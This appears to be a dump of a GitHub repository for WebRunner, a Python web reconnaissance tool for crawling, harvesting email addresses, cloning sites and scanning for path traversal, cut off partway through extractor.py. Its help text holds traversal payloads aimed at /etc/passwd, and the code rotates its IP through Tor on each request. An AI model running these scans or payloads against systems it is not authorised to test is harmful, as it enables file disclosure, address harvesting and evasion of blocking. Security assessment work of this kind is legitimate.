├── requirements.txt ├── core ├── validate.py ├── core.py ├── extractor.py └── traversal.py ├── WebRunner.py └── README.md /requirements.txt: -------------------------------------------------------------------------------- 1 | beautifulsoup4==4.13.3 2 | bs4==0.0.2 3 | certifi==2025.1.31 4 | charset-normalizer==3.4.1 5 | idna==3.10 6 | requests==2.32.3 7 | soupsieve==2.6 8 | stem==1.8.2 9 | typing_extensions==4.12.2 10 | urllib3==2.3.0 11 | -------------------------------------------------------------------------------- /core/validate.py: -------------------------------------------------------------------------------- 1 | import re 2 | 3 | class formats: 4 | def validate_url(url): 5 | url_pattern = re.compile( 6 | r'^(https?:\/\/)' 7 | r'(?:(?:\d{1,3}\.){3}\d{1,3}' 8 | r'|' 9 | r'[\da-z\.-]+\.[a-z\.]{2,6})' 10 | r'(?::\d{1,5})?' 11 | r'(\/[^\s]*)?$' 12 | ) 13 | 14 | if url_pattern.match(url): 15 | return True 16 | 17 | def validate_email(text): 18 | email_pattern = re.compile( 19 | r'[\w\.-]+@[\w\.-]{7,}' 20 | ) 21 | 22 | return email_pattern.findall(text) 23 | -------------------------------------------------------------------------------- /WebRunner.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import argparse 4 | from core.traversal import * 5 | from core.extractor import url_extractor, email_extractor, regx, clone 6 | from core.core import menu 7 | 8 | parser = argparse.ArgumentParser(add_help=False) 9 | ### attack mode 10 | parser.add_argument('mode',help='Set attack mode (traversal,scraping,regx,email-extractor)') 11 | 12 | ### General args 13 | parser.add_argument('--url',help='Set a single target URL') 14 | parser.add_argument('--url-file',help='Set txt file with multiple targets URL') 15 | parser.add_argument('--user-agent',help='Set user agent header for every http request',default="WebRunner v2.0 agent") 16 | parser.add_argument('-k','--no-tls-validation',action='store_false') 17 | parser.add_argument('-r','--follow-redirect',action='store_true') 18 | parser.add_argument('-c','--cookie',help='Set cookies to use for the requests') 19 | parser.add_argument('--timeout',default=int(10),help='Time each thread waits between requests (10s by default)') 20 | parser.add_argument('--proxy',help='Set proxy setting for all requests, use or ') 21 | parser.add_argument('--rnd-ip',action='store_true',help="Changes TOR proxy IP for every requests") 22 | parser.add_argument('--max-depth',help='this can help for traversal payloads or scrapping/crawling',default=int(3)) 23 | parser.add_argument('-h','--help',action='store_true',help="") 24 | 25 | ### args for traversal 26 | parser.add_argument('--os',help='Set target Operation System (windows/linux/all)',default="linux") 27 | parser.add_argument('-t','--threads',default=int(10),help='Set threads') 28 | parser.add_argument('--min-depth',help='this can help for traversal payloads, if u dont wanna set ../ and wanna start with ../../../ for payloads',default=int(1)) 29 | parser.add_argument('--custom-path',help='Set a custom path to create payloads example path "cgi-bin/", every payload will start as "cgi-bin/../../../etc/passwd') 30 | parser.add_argument('--custom-traversal-string',help='Set a custom traversal string to create payloads example path "....//", every payload will start as ""....//....//etc/passwd. Comma-separated list of items') 31 | parser.add_argument('--custom-file',help='Set a custom file disclosure to create payloads example "etc/custom_file.txt", every payload will end as "../../../etc/custom_file.txt". Comma-separated list of items"') 32 | parser.add_argument('-v','--verbose',action='store_true',help='Show all requested URLs with the payload used ') 33 | 34 | ### args for clone mode 35 | parser.add_argument('-n','--name',help='Set project name for clone module.') 36 | 37 | ### arg for regx mode 38 | parser.add_argument('--regx',help='Set regx string to search into target website.') 39 | 40 | 41 | args = parser.parse_args() 42 | custom_path_list = args.custom_path.split(',') if args.custom_path else [] 43 | custom_traversal_strings_list = args.custom_traversal_string.split(',') if args.custom_traversal_string else [] 44 | custom_file = args.custom_file.split(',') if args.custom_file else [] 45 | 46 | ATTACK_MODE=args.mode 47 | help_menu = menu(args.mode,args.user_agent,args.url,args.url_file,args.cookie,args.no_tls_validation,args.follow_redirect,args.timeout,args.proxy,args.max_depth,args.regx,args.os,args.name,args.min_depth,args.threads,args.verbose,custom_path_list,custom_traversal_strings_list,custom_file,args.rnd_ip) 48 | 49 | if ATTACK_MODE=='traversal': 50 | if args.help: 51 | help_menu.traversal_help() 52 | sys.exit() 53 | help_menu.print() 54 | traversal_mode = traversal(args.url,args.url_file,args.timeout,args.follow_redirect,args.cookie,args.user_agent,args.no_tls_validation,args.proxy,args.max_depth,args.os,args.threads,args.min_depth,args.verbose,custom_path_list,custom_traversal_strings_list,custom_file,args.rnd_ip) 55 | traversal_mode.scanner() 56 | 57 | elif ATTACK_MODE=='scraping': 58 | if args.help: 59 | help_menu.scraping_help() 60 | sys.exit() 61 | help_menu.print() 62 | scraping = url_extractor(args.url,args.url_file,args.timeout,args.follow_redirect, args.cookie, args.user_agent,args.no_tls_validation,args.proxy,args.max_depth,args.rnd_ip) 63 | scraping.scanner() 64 | 65 | elif ATTACK_MODE=='email-extractor': 66 | if args.help: 67 | help_menu.email_extractor_help() 68 | sys.exit() 69 | help_menu.print() 70 | extractor = email_extractor(args.url,args.url_file,args.timeout,args.follow_redirect, args.cookie, args.user_agent,args.no_tls_validation,args.proxy,args.max_depth,args.rnd_ip) 71 | extractor.scanner() 72 | 73 | elif ATTACK_MODE=='regx': 74 | if args.help: 75 | help_menu.regx_help() 76 | sys.exit() 77 | help_menu.print() 78 | regx_seek = regx(args.url,args.url_file,args.timeout,args.follow_redirect, args.cookie, args.user_agent,args.no_tls_validation,args.proxy,args.max_depth,args.regx,args.rnd_ip) 79 | regx_seek.scanner() 80 | 81 | elif ATTACK_MODE=='clone': 82 | if args.help: 83 | help_menu.clone_help() 84 | sys.exit() 85 | help_menu.print() 86 | clone_mode = clone(args.url,args.timeout,args.user_agent,args.no_tls_validation,args.proxy,args.name,args.rnd_ip) 87 | clone_mode.scanner() 88 | 89 | else: 90 | msg.error("Attack mode is required! You can use [ scraping | email-extractor | regx | clone | traversal ]") -------------------------------------------------------------------------------- /core/core.py: -------------------------------------------------------------------------------- 1 | from datetime import datetime 2 | import random, string 3 | from stem import Signal 4 | from stem.control import Controller 5 | 6 | class c: 7 | Black = '\033[30m' 8 | Red = '\033[31m' 9 | Green = '\033[32m' 10 | Orange = '\033[33m' 11 | Blue = '\033[34m' 12 | Purple = '\033[35m' 13 | Reset = '\033[0m' 14 | Cyan = '\033[36m' 15 | LightGrey = '\033[37m' 16 | DarkGrey = '\033[90m' 17 | LightRed = '\033[91m' 18 | LightGreen = '\033[92m' 19 | Yellow = '\033[93m' 20 | LightBlue = '\033[94m' 21 | Pink = '\033[95m' 22 | LightCyan = '\033[96m' 23 | 24 | class tor_conf: 25 | def change_ip(): 26 | try: 27 | c = Controller.from_port(port=9051) 28 | c.authenticate() 29 | c.signal(Signal.NEWNYM) 30 | c.close() 31 | except: 32 | msg.error("You need to set ControlPort 9051 and CookieAuthentication 1 in torrc file") 33 | 34 | class msg: 35 | def error(msg): 36 | print(f"[{c.Red}*{c.Reset}] {datetime.now()} - {c.Red}{msg}{c.Reset}") 37 | 38 | def info(msg): 39 | print(f"[{c.Blue}i{c.Reset}] {datetime.now()} - {c.Blue}{msg}{c.Reset}") 40 | 41 | def success(msg): 42 | print(f"[{c.Green}+{c.Reset}] {datetime.now()} - {c.Green}{msg}{c.Reset}") 43 | 44 | def warning(msg): 45 | print(f"[{c.Orange}!{c.Reset}] {datetime.now()} - {c.Orange}{msg}{c.Reset}") 46 | 47 | def normal(msg): 48 | print(f"[{c.Blue}!{c.Reset}] {datetime.now()} - {c.Reset}{msg}{c.Reset}") 49 | 50 | class random_data: 51 | def RandomStrings(self, size=10, chars=string.ascii_lowercase + string.digits): 52 | return ''.join(random.choice(chars) for _ in range(size)) 53 | 54 | class menu: 55 | def __init__(self,module,user_agent, url, url_file, cookie, tls_validation, follow_redirect, timeout, proxy, depth,regx,os,name,min_depth,threads,verbose,custom_path=[],custom_traversal_strings=[],custom_file=[],change_tor_ip=False): 56 | self.module = module 57 | self.user_agent = user_agent 58 | self.url = url 59 | self.url_file = url_file 60 | self.cookie = cookie 61 | self.tls_validation = tls_validation 62 | self.follow_redirect = follow_redirect 63 | self.timeout = timeout 64 | self.proxy = proxy 65 | self.depth = depth 66 | self.regx = regx 67 | self.os = os 68 | self.name = name 69 | self.min_depth = min_depth 70 | self.threads = threads 71 | self.verbose = verbose 72 | self.custom_traversal_strings = custom_traversal_strings 73 | self.custom_path = custom_path 74 | self.custom_file = custom_file 75 | self.change_tor_ip = change_tor_ip 76 | 77 | def print(self): 78 | self.WebRunnerBanner() 79 | Message=f""" 80 | - Attack mode: {c.Green}{self.module}{c.Reset} 81 | - User-agent: {c.Green}{self.user_agent}{c.Reset} 82 | - TLS Validation: {c.Green}{self.tls_validation}{c.Reset} 83 | - Follow redirect: {c.Green}{self.follow_redirect}{c.Reset} 84 | - Timeout: {c.Green}{self.timeout}{c.Reset} 85 | - Max Depth: {c.Green}{self.depth}{c.Reset} 86 | - Min Depth: {c.Green}{self.min_depth}{c.Reset}""" 87 | 88 | if self.url: 89 | Message=f"""{Message} 90 | - Target url: {c.Green}{self.url}{c.Reset}""" 91 | else: 92 | Message=f"""{Message} 93 | - Target url file: {c.Green}{self.url_file}{c.Reset}""" 94 | 95 | if self.cookie: 96 | Message=f"""{Message} 97 | - Cookie: {c.Green}{self.cookie}{c.Reset}""" 98 | 99 | if self.proxy: 100 | Message=f"""{Message} 101 | - Proxy: {c.Green}{self.proxy}{c.Reset}""" 102 | 103 | if self.proxy and self.change_tor_ip: 104 | Message=f"""{Message} 105 | - Random TOR IP: {c.Green}{self.change_tor_ip}{c.Reset}""" 106 | 107 | if self.os: 108 | Message=f"""{Message} 109 | - OS: {c.Green}{self.os}{c.Reset}""" 110 | 111 | if self.name: 112 | Message=f"""{Message} 113 | - Project name: {c.Green}{self.name}{c.Reset}""" 114 | 115 | if self.regx: 116 | Message=f"""{Message} 117 | - RegEx : {c.Green}{self.regx}{c.Reset}""" 118 | 119 | if self.threads and self.module == "traversal": 120 | Message=f"""{Message} 121 | - Threads : {c.Green}{self.threads}{c.Reset}""" 122 | 123 | if self.verbose and self.module == "traversal": 124 | Message=f"""{Message} 125 | - Verbose : {c.Green}{self.verbose}{c.Reset}""" 126 | 127 | if self.custom_path and self.module == "traversal": 128 | Message=f"""{Message} 129 | - Custom path : {c.Green}{self.custom_path}{c.Reset}""" 130 | 131 | if self.custom_traversal_strings and self.module == "traversal": 132 | Message=f"""{Message} 133 | - Custom traversal strings : {c.Green}{self.custom_traversal_strings}{c.Reset}""" 134 | 135 | if self.custom_file and self.module == "traversal": 136 | Message=f"""{Message} 137 | - Custom file disclosure : {c.Green}{self.custom_file}{c.Reset}""" 138 | 139 | 140 | print(f"""{Message} 141 | ======================================================================================================""") 142 | 143 | 144 | 145 | def WebRunnerBanner(self): 146 | print(f""" 147 | ██╗ ██╗███████╗██████╗ ██████╗ ██╗ ██╗███╗ ██╗███╗ ██╗███████╗██████╗ 148 | ██║ ██║██╔════╝██╔══██╗██╔══██╗██║ ██║████╗ ██║████╗ ██║██╔════╝██╔══██╗ 149 | ██║ █╗ ██║█████╗ ██████╔╝██████╔╝██║ ██║██╔██╗ ██║██╔██╗ ██║█████╗ ██████╔╝ 150 | ██║███╗██║██╔══╝ ██╔══██╗██╔══██╗██║ ██║██║╚██╗██║██║╚██╗██║██╔══╝ ██╔══██╗ 151 | ╚███╔███╔╝███████╗██████╔╝██║ ██║╚██████╔╝██║ ╚████║██║ ╚████║███████╗██║ ██║ 152 | ╚══╝╚══╝ ╚══════╝╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝╚═╝ ╚═══╝╚══════╝╚═╝ ╚═╝ 153 | 154 | Coded by:{c.Red} sp34rh34d {c.Reset} 155 | twitter: {c.Red}@spearh34d{c.Reset} 156 | Welcome to WebRunner v2.0 [{c.Green}https://github.com/sp34rh34d/WebRunner{c.Reset}] 157 | ======================================================================================================""") 158 | 159 | 160 | def help_general(self): 161 | print(""" 162 | Global Flags: 163 | --user-agent Set user-agent header, 'DirRunner v1.0' by default 164 | -c, --cookie Set cookies to use for every HTTP requests 165 | -k, --no-tls-validation Skip TLS certificate verification 166 | -r, --follow-redirect Follow redirects 167 | --timeout HTTP Timeout (default 10s) 168 | --proxy Set proxy setting for every HTTP request [ or ] 169 | --rnd-ip Changes TOR proxy IP for every requests (torrc file required) 170 | -h, --help Show this message 171 | """) 172 | 173 | def email_extractor_help(self): 174 | print(""" 175 | Uses Email extractor mode 176 | 177 | Usage: 178 | python3 WebRunner.py email-extractor [flags] 179 | 180 | Flags: 181 | --url Set target URL single mode 182 | --url-file Load targets URL from txt file 183 | --max-depth Set depth level to scan 184 | """) 185 | self.help_general() 186 | 187 | def scraping_help(self): 188 | print(""" 189 | Uses Scraping mode 190 | 191 | Usage: 192 | python3 WebRunner.py scraping [flags] 193 | 194 | Flags: 195 | --url Set target URL single mode 196 | --url-file Load targets URL from txt file 197 | --max-depth Set depth level to scan 198 | """) 199 | self.help_general() 200 | 201 | def regx_help(self): 202 | print(""" 203 | Uses Regx mode 204 | 205 | Usage: 206 | python3 WebRunner.py regx [flags] 207 | 208 | Flags: 209 | --url Set target URL single mode 210 | --url-file Load targets URL from txt file 211 | --regx Set RegEx query to seek into every http response 212 | --max-depth Set depth level to scan 213 | """) 214 | self.help_general() 215 | 216 | def clone_help(self): 217 | print(""" 218 | Uses Clone mode 219 | 220 | Usage: 221 | python3 WebRunner.py clone [flags] 222 | 223 | Flags: 224 | --url Set target URL single mode 225 | --url-file Load targets URL from txt file 226 | --name Set project name 227 | """) 228 | self.help_general() 229 | 230 | def traversal_help(self): 231 | print(""" 232 | Uses Path Traversal mode 233 | 234 | Usage: 235 | python3 WebRunner.py traversal [flags] 236 | 237 | Flags: 238 | --url Set target URL single mode 239 | --url-file Load targets URL from txt file 240 | --threads Set threads 241 | --max-depth Set depth level to scan 242 | --min-depth This can help for traversal payloads, if u dont wanna set ../ and wanna start with ../../../ for payloads 243 | --os Set target Operation System (windows/linux/all) 244 | --custom-path Set a custom path to create payloads example path "cgi-bin/", every payload will start as "cgi-bin/../../../etc/passwd" 245 | --custom-traversal-string Set a custom traversal string to create payloads example path "....//", every payload will start as ""....//....//etc/passwd" 246 | --custom-file Set a custom file disclosure to create payloads example "etc/custom_file.txt", every payload will end as "../../../etc/custom_file.txt". Comma-separated list of items" 247 | -v,--verbose Show all requested URLs with the payload used 248 | """) 249 | self.help_general() -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # WebRunner 2 | WebRunner is a powerful and versatile reconnaissance scanner designed for web security assessments. It performs comprehensive website scans by extracting key information such as URLs, email addresses, and custom data defined by regular expressions. With configurable crawl depth, users can tailor the scanning process—from shallow overviews to deep, exhaustive analysis—making it ideal for both quick reconnaissance and in-depth security evaluations. 3 | Additionally, WebRunner can clone entire websites, providing an offline replica for further analysis, and it includes specialized scanning features to identify vulnerabilities like path traversal. 4 | 5 | ### Install 6 | ``` 7 | git clone https://github.com/sp34rh34d/WebRunner.git 8 | cd DirRunner 9 | python3 -m venv env 10 | source env/bin/activate 11 | pip3 install -r requirements.txt 12 | chmod +x WebRunner.py 13 | ``` 14 | 15 | ### One line Installation 16 | ``` 17 | git clone https://github.com/sp34rh34d/WebRunner.git && cd WebRunner && python3 -m venv env && source env/bin/activate && pip3 install -r requirements.txt && chmod +x WebRunner.py 18 | ``` 19 | 20 | ## Features 21 | * Web Scraping/Crawler [url | email | RegEx Query] 22 | * Web Cloner 23 | * Path Traversal Scanner 24 | 25 | ## Pending features 26 | * 403 Bypass Scanner 27 | * SQLi Scanner 28 | 29 | ## TOR 30 | You can use TOR project to create your HTTP Proxy with parameter ```HTTPTunnelPort 9055```, and use that port with argument ```--proxy http://127.0.0.1:9055```, if u wanna change your IP for every request, you can use the arg ```--rnd-ip```, but you will need to especify a torrc file, create it with the following parameter. 31 | ``` 32 | #torrc file content 33 | HTTPTunnelPort 9055 34 | CookieAuthentication 1 35 | ControlPort 9051 36 | ``` 37 | Then just run ```tor -f torrc``` 38 | 39 | ### Scraping module 40 | ``` 41 | Uses Scraping mode 42 | 43 | Usage: 44 | python3 WebRunner.py scraping [flags] 45 | 46 | Flags: 47 | --url Set target URL single mode 48 | --url-file Load targets URL from txt file 49 | --max-depth Set depth level to scan 50 | 51 | 52 | Global Flags: 53 | --user-agent Set user-agent header, 'DirRunner v1.0' by default 54 | -c, --cookie Set cookies to use for every HTTP requests 55 | -k, --no-tls-validation Skip TLS certificate verification 56 | -r, --follow-redirect Follow redirects 57 | --timeout HTTP Timeout (default 10s) 58 | --proxy Set http proxy setting for every HTTP request [ or ] 59 | --rnd-ip Changes TOR proxy IP for every requests (torcc file required) 60 | -h, --help Show this message 61 | ``` 62 | 63 | ![Screenshot 2025-03-19 at 10 25 03 AM](https://github.com/user-attachments/assets/8a3ffb2f-5614-41da-b3e0-a12463ef662d) 64 | 65 | 66 | 67 | ### Email extractor module 68 | ``` 69 | Uses Email extractor mode 70 | 71 | Usage: 72 | python3 WebRunner.py email-extractor [flags] 73 | 74 | Flags: 75 | --url Set target URL single mode 76 | --url-file Load targets URL from txt file 77 | --max-depth Set depth level to scan 78 | 79 | 80 | Global Flags: 81 | --user-agent Set user-agent header, 'DirRunner v1.0' by default 82 | -c, --cookie Set cookies to use for every HTTP requests 83 | -k, --no-tls-validation Skip TLS certificate verification 84 | -r, --follow-redirect Follow redirects 85 | --timeout HTTP Timeout (default 10s) 86 | --proxy Set http proxy setting for every HTTP request [ or ] 87 | --rnd-ip Changes TOR proxy IP for every requests (torcc file required) 88 | -h, --help Show this message 89 | ``` 90 | 91 | ![Screenshot 2025-03-19 at 10 26 37 AM](https://github.com/user-attachments/assets/5199e24e-6bf8-4015-9d0d-6d4e49efc3a2) 92 | 93 | 94 | ### RegEx Query module 95 | ``` 96 | Uses Regx mode 97 | 98 | Usage: 99 | python3 WebRunner.py regx [flags] 100 | 101 | Flags: 102 | --url Set target URL single mode 103 | --url-file Load targets URL from txt file 104 | --regx Set RegEx query to seek into every http response 105 | --max-depth Set depth level to scan 106 | 107 | 108 | Global Flags: 109 | --user-agent Set user-agent header, 'DirRunner v1.0' by default 110 | -c, --cookie Set cookies to use for every HTTP requests 111 | -k, --no-tls-validation Skip TLS certificate verification 112 | -r, --follow-redirect Follow redirects 113 | --timeout HTTP Timeout (default 10s) 114 | --proxy Set http proxy setting for every HTTP request [ or ] 115 | --rnd-ip Changes TOR proxy IP for every requests (torcc file required) 116 | -h, --help Show this message 117 | ``` 118 | 119 | ![Screenshot 2025-03-19 at 10 30 20 AM](https://github.com/user-attachments/assets/c54a757a-dadd-45c6-8b87-d3edd2b29f67) 120 | 121 | 122 | ### Clone mode 123 | ``` 124 | Uses Clone mode 125 | 126 | Usage: 127 | python3 WebRunner.py clone [flags] 128 | 129 | Flags: 130 | --url Set target URL single mode 131 | --url-file Load targets URL from txt file 132 | --name Set project name 133 | 134 | 135 | Global Flags: 136 | --user-agent Set user-agent header, 'DirRunner v1.0' by default 137 | -c, --cookie Set cookies to use for every HTTP requests 138 | -k, --no-tls-validation Skip TLS certificate verification 139 | -r, --follow-redirect Follow redirects 140 | --timeout HTTP Timeout (default 10s) 141 | --proxy Set http proxy setting for every HTTP request [ or ] 142 | --rnd-ip Changes TOR proxy IP for every requests (torcc file required) 143 | -h, --help Show this message 144 | ``` 145 | 146 | Screenshot 2025-02-19 at 6 35 49 PM 147 | 148 | ![Screenshot 2025-02-19 at 6 38 17 PM](https://github.com/user-attachments/assets/52b57fe4-0e63-42ce-89db-8659d97b1749) 149 | 150 | 151 | ### Path Traversal mode 152 | When scan a single URL this should ends with ```/```, example ```https://www.example.com/```. You can scan a specific GET parameter in the URL using ```FUZZ``` string, example ```https://www.example.com/image?filename=FUZZ```. When you specify the URL ```https://www.example.com/path/javascript.js``` the URL for scan will be ```https://www.example.com/path/```. 153 | 154 | ``` 155 | Uses Path Traversal mode 156 | 157 | Usage: 158 | python3 WebRunner.py traversal [flags] 159 | 160 | Flags: 161 | --url Set target URL single mode 162 | --url-file Load targets URL from txt file 163 | --threads Set threads 164 | --max-depth Set depth level to scan 165 | --min-depth This can help for traversal payloads, if u dont wanna set ../ and wanna start with ../../../ for payloads 166 | --os Set target Operation System (windows/linux/all) 167 | --custom-path Set a custom path to create payloads example path "cgi-bin/", every payload will start as "cgi-bin/../../../etc/passwd" 168 | --custom-traversal-string Set a custom traversal string to create payloads example path "....//", every payload will start as ""....//....//etc/passwd" 169 | --custom-file Set a custom file disclosure to create payloads example "etc/custom_file.txt", every payload will end as "../../../etc/custom_file.txt". Comma-separated list of items" 170 | -v,--verbose Show all requested URLs with the payload used 171 | 172 | 173 | Global Flags: 174 | --user-agent Set user-agent header, 'DirRunner v1.0' by default 175 | -c, --cookie Set cookies to use for every HTTP requests 176 | -k, --no-tls-validation Skip TLS certificate verification 177 | -r, --follow-redirect Follow redirects 178 | --timeout HTTP Timeout (default 10s) 179 | --proxy Set http proxy setting for every HTTP request [ or ] 180 | --rnd-ip Changes TOR proxy IP for every requests (torcc file required) 181 | -h, --help Show this message 182 | ``` 183 | 184 | ![Screenshot 2025-03-19 at 12 58 47 PM](https://github.com/user-attachments/assets/5edad741-a3a4-4ff6-a6d6-cfca9ed2ad6e) 185 | 186 | 187 | With ```--custom-path```, ```--custom-traversal-string``` and ```--custom-file``` args. 188 | 189 | ![Screenshot 2025-03-19 at 1 02 48 PM](https://github.com/user-attachments/assets/dfd6472b-1864-41a0-90bd-bdf314f157c2) 190 | 191 | 192 | Using TOR project for HTTP Proxy with args ```--proxy http://127.0.0.1:9055``` and random IP with arg ```--rnd-ip```, torrc file is required for this, check TOR section to see the conf for the torrc file. 193 | 194 | ![Screenshot 2025-03-19 at 1 09 02 PM](https://github.com/user-attachments/assets/b2a92246-7687-4743-85b6-5c9d5371c44f) 195 | 196 | Requests from TOR Network 197 | ![Screenshot 2025-03-19 at 1 10 48 PM](https://github.com/user-attachments/assets/38f5a85c-1237-4ff3-a7b8-800c70ef6e42) 198 | 199 | 200 | -------------------------------------------------------------------------------- /core/extractor.py: -------------------------------------------------------------------------------- 1 | from core.validate import formats 2 | from core.core import msg, random_data, c, tor_conf 3 | from pathlib import Path 4 | import sys, requests, re, os 5 | from bs4 import BeautifulSoup 6 | from urllib.parse import urljoin, urlparse 7 | from collections import deque 8 | import urllib3 9 | urllib3.disable_warnings() 10 | 11 | class url_extractor: 12 | def __init__(self,target_url,target_url_file,timeout,follow_redirect, cookie, user_agent, tls_validation,proxy_setting, depth,change_tor_ip=False): 13 | self.target_url = target_url 14 | self.target_url_file = target_url_file 15 | self.timeout = int(timeout) 16 | self.follow_redirect = follow_redirect 17 | self.cookie = cookie 18 | self.user_agent = user_agent 19 | self.tls_validation = tls_validation 20 | self.proxy_setting = proxy_setting 21 | self.max_depth = int(depth) 22 | self.urls = [] 23 | self.urls_js = [] 24 | self.urls_img = [] 25 | self.change_tor_ip = change_tor_ip 26 | 27 | def scanner(self): 28 | try: 29 | single_or_multiple_url = 0 30 | if self.target_url: 31 | msg.info(f"starting single scan for url {self.target_url}") 32 | single_or_multiple_url = 0 33 | elif self.target_url_file: 34 | msg.info(f"starting scan for url into the file {self.target_url_file}") 35 | single_or_multiple_url = 1 36 | else: 37 | msg.error("no url detected, use --url or --url-file args") 38 | sys.exit() 39 | 40 | if single_or_multiple_url == 1 : 41 | file = Path(self.target_url_file) 42 | if not file.is_file(): 43 | msg.error(f"file {self.target_url_file} not found!") 44 | sys.exit() 45 | urls_from_file = open(self.target_url_file,"r").read() 46 | for url in urls_from_file.split("\n"): 47 | if formats.validate_url(url): 48 | self.crawl(url,0) 49 | msg.info("done!") 50 | 51 | else: 52 | if not formats.validate_url(self.target_url): 53 | msg.error(f"url {self.target_url} is invalid!") 54 | sys.exit() 55 | 56 | if self.is_alive(self.target_url): 57 | msg.info(f"Connection success for url {self.target_url}") 58 | self.crawl(self.target_url,0) 59 | msg.info("done!") 60 | r = random_data() 61 | filename = "urls_detected_"+ r.RandomStrings() +".txt" 62 | with open(filename ,"a") as f: 63 | for url in self.urls: 64 | f.write(url+"\n") 65 | for url in self.urls_js: 66 | f.write(url+"\n") 67 | for url in self.urls_img: 68 | f.write(url+"\n") 69 | 70 | msg.success(f"file {filename} created!") 71 | except KeyboardInterrupt: 72 | msg.error("Stopped by user!") 73 | sys.exit() 74 | 75 | def is_alive(self,target_url): 76 | try: 77 | headers = { 78 | "User-Agent" : self.user_agent, 79 | "cookie" : self.cookie 80 | } 81 | 82 | proxy_setting = { 83 | "http" : None, 84 | "https" : None 85 | } 86 | 87 | if self.proxy_setting: 88 | proxy_setting = { 89 | "http" : self.proxy_setting, 90 | "https" : self.proxy_setting 91 | } 92 | if self.change_tor_ip: 93 | tor_conf.change_ip() 94 | 95 | res = requests.get(target_url,headers=headers,allow_redirects=self.follow_redirect, timeout=self.timeout, verify=self.tls_validation, proxies=proxy_setting) 96 | return True 97 | except Exception as e: 98 | msg.error(e) 99 | return False 100 | 101 | 102 | def crawl(self,url, depth, visited_pages=None, visited_js=None, visited_img=None): 103 | try: 104 | if visited_pages is None: 105 | visited_pages = set() 106 | if visited_js is None: 107 | visited_js = set() 108 | if visited_img is None: 109 | visited_img = set() 110 | 111 | if int(depth) > int(self.max_depth) or url in visited_pages or not formats.validate_url(url) or url in self.urls: 112 | return 113 | 114 | visited_pages.add(url) 115 | self.urls.append(url) 116 | indent = " " * (depth * 2) 117 | msg.warning(f"{indent}Level {depth}: {url}") 118 | 119 | try: 120 | headers = { 121 | "User-Agent" : self.user_agent, 122 | "cookie" : self.cookie 123 | } 124 | 125 | proxy_setting = { 126 | "http" : None, 127 | "https" : None 128 | } 129 | 130 | if self.proxy_setting: 131 | proxy_setting = { 132 | "http" : self.proxy_setting, 133 | "https" : self.proxy_setting 134 | } 135 | if self.change_tor_ip: 136 | tor_conf.change_ip() 137 | 138 | response = requests.get(url,headers=headers,allow_redirects=self.follow_redirect, timeout=self.timeout, verify=self.tls_validation, proxies=proxy_setting) 139 | except Exception as e: 140 | msg.error(" " * (depth * 2) + f"Error fetching {url}: {e}") 141 | return 142 | 143 | soup = BeautifulSoup(response.text, 'html.parser') 144 | 145 | for link in soup.find_all('a', href=True): 146 | new_url = urljoin(url, link['href']) 147 | self.crawl(new_url, depth + 1, visited_pages) 148 | 149 | for script in soup.find_all('script', src=True): 150 | js_url = urljoin(url, script['src']) 151 | if js_url not in visited_js: 152 | visited_js.add(js_url) 153 | self.urls_js.append(js_url) 154 | msg.info(f"{indent} [{c.Orange}JS{c.Blue}] {js_url}") 155 | 156 | for img in soup.find_all('img', src=True): 157 | img_url = urljoin(url, img['src']) 158 | if img_url not in visited_img: 159 | visited_img.add(img_url) 160 | self.urls_img.append(img_url) 161 | msg.info(f"{indent} [{c.Orange}IMG{c.Blue}] {img_url}") 162 | except KeyboardInterrupt: 163 | msg.error("Stopped by user!") 164 | sys.exit() 165 | 166 | class email_extractor: 167 | def __init__(self,target_url,target_url_file,timeout,follow_redirect, cookie, user_agent, tls_validation,proxy_setting, depth,change_tor_ip=False): 168 | self.target_url = target_url 169 | self.target_url_file = target_url_file 170 | self.timeout = int(timeout) 171 | self.follow_redirect = follow_redirect 172 | self.cookie = cookie 173 | self.user_agent = user_agent 174 | self.tls_validation = tls_validation 175 | self.proxy_setting = proxy_setting 176 | self.max_depth = int(depth) 177 | self.emails = [] 178 | self.urls = [] 179 | self.change_tor_ip = change_tor_ip 180 | 181 | def is_alive(self,target_url): 182 | try: 183 | headers = { 184 | "User-Agent" : self.user_agent, 185 | "cookie" : self.cookie 186 | } 187 | 188 | proxy_setting = { 189 | "http" : None, 190 | "https" : None 191 | } 192 | 193 | if self.proxy_setting: 194 | proxy_setting = { 195 | "http" : self.proxy_setting, 196 | "https" : self.proxy_setting 197 | } 198 | if self.change_tor_ip: 199 | tor_conf.change_ip() 200 | 201 | res = requests.get(target_url,headers=headers,allow_redirects=self.follow_redirect, timeout=self.timeout, verify=self.tls_validation, proxies=proxy_setting) 202 | return True 203 | except Exception as e: 204 | msg.error(e) 205 | return False 206 | 207 | def scanner(self): 208 | try: 209 | single_or_multiple_url = 0 210 | if self.target_url: 211 | msg.info(f"starting single scan for url {self.target_url}") 212 | single_or_multiple_url = 0 213 | elif self.target_url_file: 214 | msg.info(f"starting scan for url into the file {self.target_url_file}") 215 | single_or_multiple_url = 1 216 | else: 217 | msg.error("no url detected, use --url or --url-file args") 218 | sys.exit() 219 | 220 | if single_or_multiple_url == 1 : 221 | file = Path(self.target_url_file) 222 | if not file.is_file(): 223 | msg.error(f"file {self.target_url_file} not found!") 224 | sys.exit() 225 | urls_from_file = open(self.target_url_file,"r").read() 226 | for url in urls_from_file.split("\n"): 227 | if formats.validate_url(url): 228 | self.crawl(url,0) 229 | msg.info("done!") 230 | 231 | else: 232 | if not formats.validate_url(self.target_url): 233 | msg.error(f"url {self.target_url} is invalid!") 234 | sys.exit() 235 | 236 | if self.is_alive(self.target_url): 237 | msg.info(f"Connection success for url {self.target_url}") 238 | self.crawl(self.target_url,0) 239 | msg.info("done!") 240 | r = random_data() 241 | filename = "extracted_emails_"+ r.RandomStrings() +".txt" 242 | with open(filename ,"a") as f: 243 | for email in self.emails: 244 | f.write(email+"\n") 245 | msg.success(f"file {filename} created!") 246 | except KeyboardInterrupt: 247 | msg.error("Stopped by user!") 248 | sys.exit() 249 | 250 | def crawl(self,url, depth, visited_pages=None, visited_js=None, visited_img=None): 251 | try: 252 | if visited_pages is None: 253 | visited_pages = set() 254 | if visited_js is None: 255 | visited_js = set() 256 | 257 | if int(depth) > int(self.max_depth) or url in visited_pages or not formats.validate_url(url) or url in self.urls: 258 | return 259 | 260 | visited_pages.add(url) 261 | self.urls.append(url) 262 | try: 263 | headers = { 264 | "User-Agent" : self.user_agent, 265 | "cookie" : self.cookie 266 | } 267 | 268 | proxy_setting = { 269 | "http" : 